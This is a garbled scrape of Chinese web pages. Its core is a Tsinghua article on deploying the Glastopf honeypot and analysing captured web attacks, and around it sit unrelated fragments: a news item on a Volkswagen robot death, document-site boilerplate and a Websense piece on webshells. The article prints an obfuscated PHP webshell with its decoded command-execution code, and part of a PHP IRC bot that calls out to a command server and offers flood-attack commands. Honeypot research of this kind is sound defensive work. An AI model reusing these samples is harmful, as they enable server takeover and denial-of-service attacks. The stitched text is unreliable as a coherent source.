。对清远职业技术学院web系统的安全性分析。姓名：范志霖。专业：计算机网络技术。..
扫扫二维码，随身浏览文档
手机或平板扫扫即可继续访问
web系统的安全性分析
举报该文档为侵权文档。
举报该文档含有违规或不良信息。
反馈该文档无法正常浏览。
举报该文档为重复文档。
推荐理由：
将文档分享至：
分享完整地址
文档地址：
粘贴到BBS或博客
flash地址：
支持嵌入FLASH地址的网站使用
html代码：
&embed src='/DocinViewer-4.swf' width='100%' height='600' type=application/x-shockwave-flash ALLOWFULLSCREEN='true' ALLOWSCRIPTACCESS='always'&&/embed&
450px*300px480px*400px650px*490px
支持嵌入HTML代码的网站使用
您的内容已经提交成功
您所提交的内容需要审核后才能发布，请您等待！
3秒自动关闭窗口Glastopf：Web应用攻击诱捕软件及案例分析
　Glastopf蜜罐安装过程说明
　　安装Glastopf的过程非常简单，由于它是使用Python语言开发，能够在目前主流操作系统上运行，包括各种Linux发行版（Ubuntu、Debian、Centos）、Windows XP和Mac OSX等。下面在Linux发行版Ubuntu11.04上的安装过程进行具体介绍。
　　首先需要在命令行下运行：
　　sudo apt-get install python2.5 python-mysqldb subversion
　　Glastopf需要python2.5+的支持，目前主流Linux发行版都默认安装了Python，在我们实际的安装过程中，Ubuntu11.04安装的是Python2.7.1+，Glastopf可以正常运行。由于python3.X较python2.X变化较多，所以安装过程中不要选择Python3.X版本。
　　安装上述三个软件包后，通过Subversion 下载最新的Glastopf软件：
　　svn co svn://82.165.193.71:9090/Glastopf/branches/unstable Glastopf
　　下载完成后，会在下载目录看到名为Glastopf的文件目录，进入该目录后会看到webserver.py 主文件，在运行主文件之前，需要进入conf文件夹，对里面的glastopf.cfg等相关文件的配置参数进行修改，这里面需要修改的有Glastopf的IP地址，监听端口等；如果需要数据库支持，在安装数据库后，还应该在MySQL部分对MySQL的相关信息（IP地址、端口、用户名、密码、数据库名）进行修改。修改完成后，输入命令python webserver.py，Glastopf蜜罐软件便开始运行。
　　启动后，Glastopf会自动在80端口进行监听（默认是80端口，也可以在配置文件中修改成你想监听的端口），模拟Web相关服务对外来攻击进行交互。
　　当然仅启动Glastopf程序还是不够的，你还需要为蜜罐配置一个域名，并将域名提交给搜索引擎，这样才能更加有效地吸引使用Google Hacking等搜索引擎查找Web漏洞程序的攻击，每个搜索引擎都有域名提交的页面，供想要被检索的网站进行域名提交。笔者将域名提交到Bing和Google，并成功得到检索。Google最好在以下英文页面进行提交（笔者在谷歌中国提交的页面没有检索）：
　　/webmasters/tools/submit-url?continue=/addurl/&pli=1
　　提交的域名经过搜索引擎检索后，在搜索引擎中搜索提交的域名，就能够显示相应的信息（需要经过一段时间）。那么攻击者是如何找到域名进行攻击，以及蜜罐如何模拟Web应用从而捕获攻击者的数据，我们将在下一节详细介绍。
　　Glastopf蜜罐主要工作流程介绍
　　诱惑攻击者上钩的Dorklist
　　当前Web攻击寻找目标的一个重要方法便是利用Google Hacking技术，通过搜索引擎搜索存在弱点的网站。举一个简单的例子：著名的安全网站http:/ /packetstormsecurity.org每天都会公布互联网存在的漏洞，其中Web应用漏洞出现的频率很高，该网站在日公布了//news_desc.php?Id=[Sqli]存在SQL注入漏洞，很明显news_desc.php?Id是该漏洞的关键字，会利用该关键inurl：&news_desc.php&在搜索引擎中进行搜索，找到可能存在SQL注入的网站。
　　Glastopf软件作者Lukas在分析了黑客的行为之后，聪明地构造了Dorklist机制，并将其放置在Glastopf/res/目录下的index.html文件中，其中记录了最新的关键字。读者可能会想到，当前新漏洞每天都会出现，如何把最新的漏洞关键字加入到Dorkl ist 中是一个很关键的问题。这里，Lukas考虑到攻击者在找到蜜罐所在的域名后，会对各种漏洞均进行尝试，例如上面给出的例子中，攻击者在试验了SQL注入攻击后，还有可能去尝试类似/hackme.php?color=/shell.php这样的远程文件包含漏洞，这样关键字hackme.php?color便会被记录下来，并添加到Dorklist中，实现Dorklist的动态更新，使得Glastopf能够对最新的Web攻击数据进行记录。
　　需要指出的是，目前Glastopf的实现中并没有对模拟的Web蜜罐系统做SEO(搜索引擎优化)来提高检索排名，但是从实际运行数据看，搜索结果并不影响蜜罐的实际工作，我们从日成功提交给Bing进行检索后，每天都会捕获大量攻击记录主要工作流程
图1 工作流程概要图
　　在攻击者利用Google Hacking找到蜜罐并开始发动攻击之后，Glastopf蜜罐如何与攻击者进行交互并捕获攻击数据成为另一项重要的工作。这里我们以Glastopf中比较成熟的远程文件包含漏洞模块为例，介绍Glastopf蜜罐的整体工作流程：
　　首先，所有攻击进入蜜罐后大致要经过以下几个过程：
　　攻击者提交的HTTP请求方法是区分对待的，如果是POST方法，那么整个提交数据都被存储到蜜罐中。如果是HEAD 方法，Glastopf 蜜罐会给予一个简单服务器应答。Glastopf能够很好地处理GET方法，当处理GET方法时，蜜罐首先判断出攻击是属于哪种类型，因此，蜜罐内会对已知的攻击类型进行定义，然后对攻击进行判断，例如：上一节所举案例中提到的&color&是一个存有恶意URL的变量，这就是经常遇到的攻击类型&&远程文件包含。然后蜜罐会触发对远程文件包含所特有的处理函数，代码如下：
　　if '=http://' in request:
　　handle_rfi_request()
　　这样上面的远程文件包含漏洞就会被相应的函数做进一步处理：
　　图2是Glastopf对目前攻击进行分类并处理工作过程。
图2 Glastopf对目前攻击进行分类并处理工作过程
　　拿远程文件包含漏洞模拟（RFI）进行具体说明，对于一个典型的RFI攻击请求URL：
　　/hackme.php?color=/shell.php前面已经提到该攻击&&远程文件包含已经被蜜罐识别出来，进一步我们首先要知道远程文件包含想要做哪些事，这类攻击实际上是想让一个恶意脚本在远程主机运行并获取相关的数据，所以当远程文件包含攻击发生时，获取到相关的脚本（必要时进行Base64 Decode处理），然后使用漏洞模拟器（函数）扫描脚本中的每一行，如果存在echo函数调用，对echo函数中的每一个变量进行替换并给出模拟值。例如，包含的文件中含有：
　　$un = @php_uname();
　　$up = system(uptime);
　　echo &uname -a: $un&br&&;
　　echo &uptime: $up&br&&;
　　那么Glastopf会替换@php_uname()变量的值，这样当攻击者请求远程文件的内容时会得到如下模拟值：
　　uname -a: GNU/Linux&,&Linux
2.6.18-6-k7&br&
　　uptime: 19:42:43 up 3 days, 22:39, 1 user, load average: 0.9, 0.2 0.1
　　这样就模拟了一次与攻击者的交互。完成交互后，存储相关的攻击文件，最后把攻击事件记录到日志中，同时将漏洞关键字存储到Dorklist中。
　　分布式部署
　　由于单独部署一个蜜罐所获取到的数据具有一定局限性，如果将在分布式部署的Glastopf蜜罐节点的数据都收集起来，那么汇聚数据将能够更好的反映目前Web应用攻击现状。Glastopf支持分布式部署，每个部署节点都能通过内置的数据提交模块向核心提交数据。核心数据库上面会用一个Python脚本对各个节点提交的数据进行接收，同时，数据汇集到数据库后，将通过几个分析模块进一步分析，包括对攻击源IP的定位等。
　　Glastopf蜜罐捕获数据统计和样本分析
　　清华大学网络与信息安全实验室自6月25日部署了Glastopf蜜罐，同时我们配置的域名***.***.被Bing、Google等搜索引擎检索之后，截至到日，捕获了来自894个不同源IP地址的Web攻击4000多次，捕获到各种攻击文件样本426个。我们对这些攻击数据按照时间、地理位置等进行了统计，然后对某些典型的攻击样本进行了详细的分析。
　　数据统计
　　我们进一步结合GeoIP定位库对这些攻击源IP地址所在的国家进行查询和统计，图3给出了我们部署蜜罐所捕获Web攻击源IP数量排名前15的国家列表，前三位为美国、中国和法国。图4则给出了针对每个攻击源IP地址在部署期间捕获的发起攻击次数、攻击文件样本数及不同样本数的概率累积分布图（CDF），从图中可以看到目前绝大多数源IP对蜜罐发起的攻击数量均集中在10次以内。图5显示了十月份蜜罐每日捕获的攻击次数，区间为31次到280次，平均每日捕获106次攻击。
图3 Glastopf采集的攻击来源前15名的国家
图4 攻击概率累积分布图（CDF）
图5 十月份每日蜜罐捕获Web攻击次数
　　（数据采集时间日至10月30日，国家名和IP通过geoip[8]数据库进行查询并统计，IP地址根据直接攻击IP统计）
　　(数据采集时间日至10月30日,横坐标为一个IP发起的攻击数量、攻击的文件数和不同的攻击文件数，纵坐标为攻击IP数量占整体IP数量的比例)　Glastopf可以将攻击信息分为几类记录到MySQL数据库中，蜜罐作者根据捕获信息，分别定义了数据库表结构，在主机安装好MySQL数据库后，可以将structure目录下sql文件导入到命名为Glastopf的数据库中，这样就可以将有价值的数据输出至数据库中，便于分析。为了对攻击数据进行更好展现，Glaos项目组成员开发了针对Glastopf的Web UI 程序Glasif，用户只需要再安装Apache服务，配置相关的Glasif脚本，就可以访问到Glasif界面。
　　通过对捕获日志进行分析，我们发现每天至少捕获了十几次攻击事件，包括网络中大量存在的Web应用漏洞扫描器探测扫描。攻击数据均存储在/root/Glastopf/files文件夹下。通过Glasif，能够对Glastopf捕获攻击数据进行很直观的查看和分析，并对一些数据，例如域名、攻击IP、攻击来源进行分类统计，下图统计了被攻击者利用的域名列表（这些被利用的域名都是黑客用来存储恶意脚本的，可能是黑客自己架设的服务器，也可能是被攻陷的某个网站服务器域名）：
图6 被利用域名情况统计
　　蜜罐获取的Web攻击文件列表如下所示：
图7 捕获文件地址统计
　　Glastopf给每个捕获文件都进行哈希运算，这样可以保证记录的文件不重复。
　　4.2 两个攻击样本分析
　　在所有捕获的数据中，抽取了两个典型的攻击样本，其中捕获的一个样本文件如下：
　　&?php^M$vopcrew = &pZLNd8MwEITvgbyDIgyWIZT059Q0xdB
　　YYg30TRCOvIpIecl15cYh5N0ryWTSUCCH3sTMzrfDosQgTJF8/b7mH5/
　　L6QRRcgj9TLRi9mT3srGv9CwafEEMjk0immVSSBnfgLDtR0
　　OgdMHJxtTF8spnIjstnDKaxDkJ2cGnLYQO
　　duonlCR5Blrr9oMdfCXZGOPQK2fIRehOpNHNwzMOzwMo
　　LD4Bv43SjH52bTaOvkeNYw2IFdQ1v2BCjPyiD4VhQ/
　　booDkVMxuOrrCOhUM+S3TIyPdQW2NcGO1Ae1Gc9
　　SLokosaCs1hrHkLUUrZ7urS0fz32lwh90TTTAEskQ
　　HRmhb0Y2t3dvb3dzR8il2ld2CzXIKRPpJy5ECif+fD0k9Eb
　　Wh+v2trypbkGMqK2mCgx9VeseA6q3AoK
　　L8=&;^Meval(gzinflate(str_rot13(base64_decode($vopcrew))));
　　可以看到该文件是一个P H P 文件，其内容经过了gzinflate、str_rot13、base64_decode三个函数的处理之后，再通过eval执行。很明显，我们在这个文件中添加一行输出语句，就能看到解码后的文件内容，经过整理后如下所示：
　　&html&
　　$os = @_OS;//获取系统
　　echo &v0pCr3w&br&&;
　　echo &os:$os&br&&;
　　$cmd=&id&;
　　$eseguicmd=exec($cmd); //执行命令
　　echo $
　　function exec($cfe){
　　$res = '';
　　if (!empty($cfe)){
　　if(function_exists('exec')){
　　@exec($cfe,$res);
　　$res = join(&\n&,$res); //如果$res是空，一行一个组成数组
　　elseif(function_exists('shell_exec')){
　　$res = @shell_exec($cfe);
　　}//shell_exec执行$cfe
　　elseif(function_exists('system')){
　　@ob_start();
　　@system($cfe);
　　$res = @ob_get_contents();
　　@ob_end_clean();//system命令执行$cfe（系统某个信息）
　　elseif(function_exists('passthru')){
　　@ob_start();
　　@passthru($cfe);
　　$res = @ob_get_contents();
　　@ob_end_clean();//passthru计数返回contents 然后clean
　　elseif(@is_resource($f = @popen($cfe,&r&))){
　　$res = &&;
　　while(!@feof($f)) { $res .= @fread($f,1024); }
　　@pclose($f);
　　}}//可读r模式查看$cfe并且每1204接一次包
　　return $
　　&/&&通过我们的注释可以看到，这段PHP脚本是一段可以执行输入shell命令并返回执行结果的Webshell。
　　另外一个捕获到的Web攻击请求URL为：:8080/glasif/showrfi.php?
　　url=http://sna.cl/ww/admin/spaw2/uploads/files/byroe.jpg??
　　打开捕获文件，如下所示：
　　* -JAVAHACK. since 2011
　　* REcoding by: JAVAHACK community
　　* COMMANDS:* .user &password& //login to the bot
　　* .logout //logout of the bot
　　* .die //kill the bot
　　* .restart //restart the bot
　　* .mail &to&&from&&subject&&msg& //send an email
　　* .dns&IP|HOST& //dns lookup
　　* .download &URL&&filename& //download a file
　　* .exec &cmd& // uses exec() //execute a command
　　* .sexec&cmd& // uses shell_exec() //execute a command
　　* .cmd&cmd& // uses popen() //execute a command
　　* .info //get system information
　　* .php&php code& // uses eval() //execute php code
　　* .tcpflood&target&&packets&&packetsize&&port&&delay& //tcpflood attack
　　* .udpflood&target&&packets&&packetsize&&delay& //udpflood attack
　　* .raw &cmd& //raw IRC command* .rndnick //change nickname
　　* .pscan&host&&port& //port scan
　　* .safe // test safe_mode (dvl)
　　* .inbox &to& // test inbox (dvl)
　　* .conback&ip&&port& // conect back (dvl)
　　* .uname // return shell's uname using a php function (dvl)
　　/set_time_limit(0);
　　error_reporting(0);
　　echo &ok!&;
　　class pBot
　　var $config = array(&server&=&&jatimcrew.uk.to&,
　　&port&=&&6667&,
　　&pass&=&&&,
　　&prefix&=&&peak&,
　　&maxrand&=&&5&,
　　&chan&=&&#asu&,
　　&chan2&=&&#asu&,
　　&key&=&&bot&,
　　&modes&=&&+ps&,
　　&password&=&&asu&,
　　&trigger&=&&.&,
　　&hostauth&=&&*& // * for any hostname (remember: /setvhostracun.dunia)
　　var $users = array();
　　function start()
　　if(!($this-&conn = fsockopen($this-&config['server'],$this-&config['port'],
　　$e,$s,30)))
　　$this-&start();
　　$ident = $this-&config['prefix'];
　　&&&&&&&&&&&&&&&&&&&&&部分省略
　　从上面的代码可以看出，这是一个典型的PHP僵尸程序，该僵尸程序运行后，通过口令和密码进行连接到jatimcrew.uk.to所在的服务器6667端口，接受服务器控制。该程序能够进行DNS查询、系统信息查询、远程重启、远程运行文件等多种命令，还可以运行一些高级的远程IRC命令、远程扫描端口，进行TCP或者UDP泛洪攻击，如果僵尸主机组足够多的话，完全能够实施一次分布式拒绝服务（DDOS）攻击。在这个程序中，通过.tcpflood 192.0.2.0
1 命令就可以让僵尸主机以每秒1000数据包（包长为100）的速率向192.0.2.0主机的80端口发起攻击。
　　Glastopf是一款在开源社区非常不错的低交互式Web应用蜜罐软件，由于代码全部使用编写，能够在各种主流操作平台上进行广泛部署，同时它的安装和配置过程相对简单，方便研究者和安全兴趣爱好者使用。通过我们在清华大学网络中心网络与信息安全实验室近三个多月的运行，我们发现它的稳定性也很好，共捕获到各种恶意攻击文件400多个，攻击4000多次，同时在Dorklist中更新了大量Web应用攻击点。整体来说，Glastopf能够基本完成Web应用蜜罐的功能。
　　值得指出的是，Glastopf蜜罐还有很大的改进空间，特别是在与攻击者交互（模拟真实系统）、记录更多的攻击数据（XSS、SQL注入等）、分析捕获数据等方面。目前这些功能在GlastopfNG中正在积极开发，如果这些功能能够完整地添加到GlastopfNG中去，那么将使得该蜜罐成为一款功能更为强大的Web应用蜜罐。
　　读者如果对Glastopf感兴趣进行部署，或者想增加其中的某些功能，进行模块编写，都可以联系本文作者或联系蜜罐作者Lukas Rist。需要特别指出的是，Lukas在开源社区的工作非常活跃，今年以来又编写发布了用来分析捕获的恶意文件样本的PHP Sandbox，以及用来捕获Webshell的PHPShell Honeypot等非常有意义的工具，感兴趣的读者可以参考http://dev.glastopf.org/网站，积极参与到开源项目中。
　　（清华大学计算机科学与技术系、清华大学网络中心、CCERT 应急响应组）大众机器人攻击事件1工人身亡 人工智能遭质疑
图为德国大众公司装配线上的机器人
大众机器人攻击事件1工人身亡 人工智能遭质疑
大众的机器人出大事了，人工智能的安全性问题又被摆到了台面上。
这家德国的著名汽车制造商周三表示，大众工厂中的一个机器人杀死了一名现场工作人员。
大众公司的新闻发言人Heiko&Hillwig表示，这名工人在大众的Baunatal工厂工作，在法兰克福北部大约100公里。
据了解，当时这名22岁的外包员工被机器人抓住，并将他碾压向了一块金属板，最终导致这名员工伤势过重被送医后身亡。
Heiko&Hillwig还表示，这名机器人并非流水线上与工人一起工作的机器人，而是在安全笼中的。当时遇难工人正在负责安装机器人，所以身处安全笼之中。该发言人强调，这款机器人通常是在一个封闭区域工作的，负责抓取汽车零件并进行相关操纵。
现场还有另一名工人也在，但他被障碍物阻挡，没有受到机器人的伤害。机器人自身也没有遭到损坏。
Hillwig拒绝透露更多案件的相关信息。根据德新社的报道，检察官正在考虑是否提出指控，但指控对象目前还难以界定。
此前有Twitter网友指出，报道此事件的《金融时报》女记者名为Sarah&O&Connor，与知名电影《终结者》中女主角Sarah&Connor（人类反抗机器人领袖的母亲)名字相似，认为这是一种警示。
长久以来关于人工智能和机器人安全的话题都不断被提起，特斯拉CEO马斯克和比尔盖茨等人都在不同场合公开表达过对机器人技术的担忧。史蒂芬&霍金曾联合百余名位科学家、企业家、投资者签署一封公开信，提醒人们关注人工智能的安全性和社会效益。
1月份，马斯克还曾向未来生命研究所(Future&of&Life&Institute）捐赠1000万美元，资助他们研究人工智能的安全性。该研究所的目的是确保人类对人工智能始终拥有控制权，确保机器人不会毁灭人类。
官方微博/微信
每日头条、业界资讯、热点资讯、八卦爆料，全天跟踪微博播报。各种爆料、内幕、花边、资讯一网打尽。百万互联网粉丝互动参与，TechWeb官方微博期待您的关注。
↑扫描二维码
想在手机上看科技资讯和科技八卦吗？想第一时间看独家爆料和深度报道吗？请关注TechWeb官方微信公众帐号：1.用手机扫左侧二维码；2.在添加朋友里，搜索关注TechWeb。
大众机器人攻击事件
相关的资讯有：
大众机器人攻击事件
相关的博文有：
今天，小米再次秀出了11月24日要发布的新机，并强调该机的内部产品代号：霸道总裁。
在此前索尼召开的“与我为5”发布会上，正式在国内推出了索尼Xperia Z5和Xperia Z5尊...
此前我们报道了2016款三星GALAXY A7获得蓝牙认证的消息，而现在该机又有三个版本的配...
个人征信领域，腾讯与阿里早已介入，而现在小米也要进入该领域。虽然作为后来者，但在...
很多人的心里，苹果是一家卖电脑，卖手机，卖平板电脑，卖智能手表，卖 iPod ，总之就...
11月19日消息，近日，乐视7000多万元夺得2016年央视春晚第一标，成为春节晚会上唯一一...
安兔兔评测是国内以及国际市场最为流行的跑分应用之一，不过面对越来越多的跑分无用论...
节日临近，移动互联网的圈子又热闹了起来，各种新产品、新理念、新玩法层出不穷，不过...
如果你看到有个人捧着手机傻笑，不用担心他没病，肯定又是看什么热播大剧呢！现代人的...
虚荣国服终于和玩家们见面，这款游戏此前就常被拿来和LOL英雄联盟对比，小编就为大家......
奥特曼版权在中国游戏市场遭遇惊人的侵权行为，中国市面上约99%主打奥特曼元素的手游......
根据财报显示，Nexon当季度总收入达到498亿韩元，比去年同期上升22%；运营利润和净利......
《阿瓦隆：炉之火》是一款幻想RPG游戏。这款游戏从2014年初就开始制作，经过2年的时间......
Copyright (C)
All rights reserved.
京公网安备号
请选择一张图片分享
要转发到新浪微博，请
要转发到QQ空间，请Web服务攻击痕迹检测_百度文库
两大类热门资源免费畅读
续费一年阅读会员，立省24元！
Web服务攻击痕迹检测
上传于||文档简介
&&W​e​b​服​务​攻​击​痕​迹​检​测
阅读已结束，如果下载本文需要使用
想免费下载本文？
下载文档到电脑，查找使用更方便
还剩2页未读，继续阅读
你可能喜欢您所在的位置： &
WebShell成大规模攻击突破口 专家提示黑客入侵步骤
WebShell成大规模攻击突破口 专家提示黑客入侵步骤
攻击者利用WebShell发动网络攻击已是惯用的手法，随着攻击手法的交替更迭，可以逃避安全检测的攻击技术方法让不法分子在发动攻击时更加得心应手。
攻击者利用WebShell发动网络攻击已是惯用的手法，随着攻击手法的交替更迭，可以逃避安全检测的攻击技术方法让不法分子在发动攻击时更加得心应手。作为Web安全、数据安全、电子邮件安全、移动安全及数据泄露防护(DLP)解决方案提供商，Websense一直致力于为企业提供全面的安全防护。Websense的安全专家对于此类利用WebShell发动的网络攻击有着深刻理解，并具有丰富的防范经验。得益于Websense ThreatSeeker智能云的帮助，Websense安全专家已经成功检测到多起攻击事件，这些网络攻击的目标涵盖了全球85,000,000多个网站，而且在这些攻击中，攻击者使用了不同的攻击技术。
Websense安全专家指出，许多大规模的入侵活动都可以自动完成：查找系统漏洞，发现漏洞之后，自动安装漏洞利用工具。接管程序通常也会将远程管理工具下载到被入侵网站。在攻击者成功入侵网站之后，他们所部署的常见工具就是WebShell。下面是Websense安全专家检测到的一起攻击事件。在此次攻击中，攻击者首先找到托管Web应用漏洞，然后上传一个以服务器支持的语言编写而成的恶意应用程序后门。这样，攻击者就可以实现对整个Web服务器的控制。
攻击者向服务器中添加恶意后门工具，以实现对整个服务器的控制
WebShell是可以在系统上运行并且可以远程管理电脑的脚本或代码(以PHP、Perl、Python等脚本语言编写而成)。尽管很多时候WebShell可以用作远程管理工具，但是它们也很有可能会被恶意软件编写者利用，作为入侵网站的工具。一旦攻击者可以在Web服务器上执行此脚本，他就获得了对托管操作系统外壳程序的访问权限，与Web服务器拥有相同的特权。为了躲避防火墙或杀毒软件的检测，攻击者通常会采用代码混淆与加密等规避技术。企业需要完整的内容检测方法来检测并拦截WebShell的传播，并且可以采用各种常见混淆技术或解密脚本来揭露其真正意图。
以下是Websense安全专家检测到的另一起网络攻击。在此次攻击中，攻击者利用了一个名为&oRb&的自定义WebShell。该WebShell本身可以通过混淆技术来躲避检测，并且使用了带有&e&修饰符的preg_replace函数。此外，通过在标题中声明文件类型是图形文件，服务于此WebShell的URL也在试图误导系统安全工具。
一旦WebShell脚本在网络中运行，就会为服务器的远程操作提供相应的Web接口：服务器信息、文件管理器(访问文件系统)、访问执行命令、SQL管理器、PHP代码执行、搜索文件与文件中的文本、上传恶意内容、注入大量代码等，为企业网络带来了极大的安全威胁。
Websense安全专家表示，Websense作为Web安全行业的领军企业，始终致力于保护用户免受各种网络攻击的侵害。具有实时扫描功能的Websense ACE?(高级分类引擎)可以检测各种混淆方法与技术，阻止用户对恶意WebShell或网页的访问，并监控出站内容，防止敏感数据离开企业网络，为企业网络提供实时的安全防护。同时，Websense ThreatSeeker网络作为具有网络识别功能的最大规模智能网络，每天可以处理近50亿的Web请求，为企业提供实时的安全分析更新。
&【编辑推荐】【责任编辑： TEL：（010）】
关于&&的更多文章
为更好地应对互联网安全挑战，交流最新的安全技术与解决方案，国
虽然网购有诸多优点，越来越多的人热衷于此，但网购的安全性也逐渐凸显
你是否知道上网行为管理？您认为上网行为管理包括哪些
随着互联网Web技术的全面应用，对Web应用防火墙来说，
RSA中国大会将促进中国信息安全专业人员与国际信息安
本书是在《网管员必读―网络基础》（第1版）基础上修改而成的。全书共分9章，分别介绍计算机网络概述（修改）、数制（新增）、网
51CTO旗下网站}